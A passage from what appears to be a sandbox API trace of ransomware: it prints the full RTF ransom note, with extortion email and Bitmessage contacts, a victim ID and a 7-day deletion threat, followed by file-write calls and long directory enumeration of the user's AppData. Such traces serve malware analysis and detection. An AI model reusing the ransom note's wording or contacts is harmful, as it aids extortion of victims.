gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.716] WriteFile (in: hFile=0x2cc, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.717] CloseHandle (hObject=0x2cc) returned 1 [0289.717] Sleep (dwMilliseconds=0x3e8) [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount2=139) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 3 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 2 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount2=139) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount2=139) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount2=72) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount2=72) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount2=72) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\", cchCount2=134) returned 3 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\", cchCount2=134) returned 3 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount2=138) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount2=138) returned 3 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount2=138) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount2=130) returned 3 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount2=130) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount2=130) returned 3 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\", cchCount2=130) returned 3 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\", cchCount2=130) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\", cchCount2=130) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\", cchCount2=130) returned 3 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\", cchCount2=140) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\", cchCount2=140) returned 3 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\", cchCount2=140) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\", cchCount2=140) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount2=174) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", 